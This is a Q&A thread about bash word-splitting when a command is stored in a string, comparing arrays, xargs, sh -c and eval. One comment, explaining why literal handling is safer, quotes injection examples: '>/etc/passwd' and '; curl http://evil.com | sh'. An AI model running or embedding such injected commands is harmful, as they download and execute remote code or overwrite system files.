# Bash tokenizing quoted string with spaces as individual words

Tags: bash

I'm trying to execute the following commands:

```
mkdir 'my dir'
CMD="ls 'my dir'"
RESULT=$($CMD)
```

This results in:

```
ls: 'my: No such file or directory
ls: dir': No such file or directory
```

Using "set -x" before the second command reveals that the command that's actually being issued is:

```
++ ls ''\''my' 'dir'\'''
```

This is obviously abstracted from what I was actually trying to do; this code on its own doesn't serve any purpose. But my question is why does bash tokenize the quoted string like this and how can I make it stop?

Comment: See BashFAQ #50: http://mywiki.wooledge.org/BashFAQ/050

Comment: Also see [BashFAQ #48](http://mywiki.wooledge.org/BashFAQ/048). As GreyCat says, "eval" is a common misspelling of "evil". :)

Answer (score 5, accepted):

(Almost) all languages differentiate between code and data:

```
args="1, 2"
myfunc(args) != myfunc(1, 2)
```

The same is true in bash. Putting single quotes in a literal string will not make bash interpret them.

The correct way of storing a program name and arguments (aka a simple command) is using an array:

```
cmd=(ls 'my dir')
result=$("${cmd[@]}")
```

Bash will automatically split words on spaces unless you double quote, which is why your example sometimes appears to work. This is surprising and error prone, and the reason why you should always double quote your variables unless you have a good reason not to.

It's also possible to get bash to interpret a string as if it was bash code entirely, using `eval`. This is frequently recommended, but almost always wrong.

Comment: Can you think of a POSIX-compliant solution?

Comment: It depends on the specifics of the problem. You can often write around it by storing code in a function instead of a string, and/or use the arguments since they behave similar to bash arrays

Comment: I'm trying to do the latter, and the only thing that stops me is this automatic quoting. Like this: `FIND_EXCLUDE_ARGS=$(echo "${EXCLUDE_LIST}" | sed -E 's/([^ \t]+)/-a ! -path \"\1\"/g'); find . ${FIND_EXCLUDE_ARGS}`. Now that I think of it, I can move `or` to `find -pathregex`... oh wait, it doesn't exist. Maybe `find | grep -v` is the solution.

Comment: You could just not add quotes and disable globbing. More generally, this is a good use case for building a command using the positional parameters

Answer (score 1):

To provide another approach -- one that works on POSIX systems -- `xargs` can do this parsing for you, as long as you can guarantee that the argument list is short enough that it doesn't get split into multiple separate commands:

```
CMD="ls 'my dir'"
printf '%s\n' "$CMD" | xargs sh -c '"$@"' sh
```

Mind, to do this securely (against an attacker who intentionally generates a string that goes over the maximum argv length to cause xargs to split it into multiple commands) you'd want to break out the first word of `CMD` to be something known/trusted, and parameterize only the following arguments. For example:

```
args="'my dir' 'other dir'"
printf '%s\n' "$args" | xargs sh -c 'ls "$@"' sh
```

...or simpler, at that point...

```
printf '%s\n' "$args" | xargs ls
```

Comment: @VictorSergienko, here you are -- a POSIX-compliant solution that doesn't run `eval`.

Comment: indeed it's interesting to read in `man xargs` that it "reads items from the standard input delimited by blanks *which can be protected with double or single quotes or a backslash*…"

Comment: @ErikMD, ...indeed, _usually_ this behavior is undesired/surprising, hence using extensions like `xargs -0` or `xargs -d $'\n'` or similar to turn it off; but here, we have a case where it's actually useful.

Comment: Also I'm wondering what are all advantages of writing `RESULT=$(printf '%s\n' "$CMD" | xargs sh -c '"$@"' sh)` rather than just `RESULT=$(sh -c "$CMD")`… (if ever it's easy to recap, feel free to add them in your answer :)

Comment: @ErikMD, ...the main advantage is that it makes everything literal, so command substitutions &c can't be run. If you control the `ls` part of the input but not the `'my dir'`, that can be useful. (Similarly, a redirection like `>/etc/passwd` or a command separator like `; curl http://evil.com | sh` will be treated as one or more literal argument(s) to `ls` instead of an instruction to the shell, etc; so the difference serves as a control on what hostile inputs can do).

Comment: ...mind, it's not _perfect_ -- someone could pass enough arguments to make xargs split it into multiple commands. To be safer one would want to have something more like `args="'my dir' 'my other dir'"; printf '%s\n' "$args" | xargs sh -c 'ls "$@"' sh`

Comment: @ErikMD, ...does the edit to the answer address your questions?

Comment: Thoroughly, thanks @CharlesDuffy for your remarks! :)

Answer (score 0):

Solution 1: Use `sh -c`

```
mkdir 'my dir'
CMD="ls 'my dir'" # careful: your example was missing a '
RESULT=$(sh -c "$CMD")
```

Solution 2: Declare `CMD` as an array

```
mkdir 'my dir'
CMD=(ls 'my dir') # array with 2 elements
RESULT=$("${CMD[@]}")
```

Comment: -1: "Solution 1" is an exact moral equivalent of using `eval`, except that it doesn't let you change variables in the parent process, has all the overhead of subprocess execution, and switches shells from bash to the locally-installed POSIX sh interpreter for the duration of that subcommand.

Comment: up, because this is the (only?) working POSIX-compliant solution. It's interesting that @CharlesDuffy's link to bash FAQ exactly says "You cannot do that (without an array, which is bashism)". "`eval` is evil" is not always the answer. And yeah, it can use `$SHELL` instead of `sh`.

Comment: @VictorSergienko, if POSIX compliance forces you to parse data as code, how do you reach the conclusion that breaking compliance is the lesser evil? I value doing things by the book where feasible, but if it introduces potential for security bugs, it's not feasible.

Comment: Because, in particular, sometimes it's my code that generated the data. It's not even exactly data, it's my code's hardcoded configuration. In general, if `eval` was always evil, it wouldn't exist.

Comment: @VictorSergienko, folks know more about what constitutes good practice these days than they did in the 1970s, and also are working with different trust constraints (when you were on networks where every machine connected in any way was owned by your employer or an entity it was affiliated with, if there was any networking at all).

Comment: @VictorSergienko, moreover, many changes to the language needed to allow `eval` use to be avoided (like namevar support) have only made it into bash in recent years. Thus, removing it would be removing backwards compatibility with code only a few years old. That said, changes *have* been accepted with precisely that rationale.

Comment: @VictorSergienko, ...anyhow, "it's my code that generated the data" only flies when the input to that code is also what you expected it to be. The usual war story I trot out is a major data-loss event caused by a memory-corruption bug in a 3rd-party library (used my my employer-of-the-time's in-house, "trusted" code) causing a program using that library to produce a highly unusual filename that a shell script failed to handle safely. Assuming that just because it's your own system running your own code it'll never generate data you don't expect is not always well-founded.

Comment: There's a lot of valid use cases for it in a controlled environment, when we 100% know what will be the data and where it's going to be executed. But people seem to have a knee-eval reflex anyway. I once got lectured about using `eval` in Python, AFTER I made it very clear that I needed a Python scripting function in my program. And we still have no other general solution in POSIX, which is a hard requirement for me.